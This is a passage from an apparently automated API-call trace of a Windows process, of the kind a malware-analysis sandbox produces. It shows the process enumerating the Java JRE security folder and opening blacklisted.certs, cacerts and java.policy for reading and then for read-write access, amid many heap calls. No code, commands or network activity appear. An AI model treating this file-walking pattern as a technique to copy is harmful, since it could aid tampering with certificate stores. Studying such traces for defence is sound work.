Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.801] AreFileApisANSI () returned 1 [0097.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0097.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82dd8 [0097.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 66 [0097.801] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.801] GetFileType (hFile=0x33c) returned 0x1 [0097.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0097.802] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.802] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.802] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.802] CloseHandle (hObject=0x33c) returned 1 [0097.802] AreFileApisANSI () returned 1 [0097.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0097.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82298 [0097.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 66 [0097.802] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.802] GetFileType (hFile=0x33c) returned 0x1 [0097.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0097.802] CloseHandle (hObject=0x33c) returned 1 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.804] AreFileApisANSI () returned 1 [0097.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82c28 [0097.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs") returned 66 [0097.804] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklisted.certs"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e5)) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0097.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.804] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c0eb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="cacerts", cAlternateFileName="")) returned 1 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a6f8 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0097.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0097.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0097.805] AreFileApisANSI () returned 1 [0097.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts", lpUsedDefaultChar=0x0) returned 56 [0097.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.805] AreFileApisANSI () returned 1 [0097.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0097.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0097.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 56 [0097.805] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.805] GetFileType (hFile=0x33c) returned 0x1 [0097.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0097.805] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.806] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.806] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.806] CloseHandle (hObject=0x33c) returned 1 [0097.806] AreFileApisANSI () returned 1 [0097.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0097.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0097.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 56 [0097.806] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.806] GetFileType (hFile=0x33c) returned 0x1 [0097.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0097.806] CloseHandle (hObject=0x33c) returned 1 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.807] AreFileApisANSI () returned 1 [0097.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0097.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0097.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts") returned 56 [0097.807] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\cacerts"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c0eb)) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="java.policy", cAlternateFileName="JAVA~1.POL")) returned 1 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0097.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.808] AreFileApisANSI () returned 1 [0097.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy", lpUsedDefaultChar=0x0) returned 60 [0097.808] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.808] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.809] AreFileApisANSI () returned 1 [0097.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0097.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0097.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=60 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 60 [0097.809] CreateFileW (lpFileName="C:\\Program 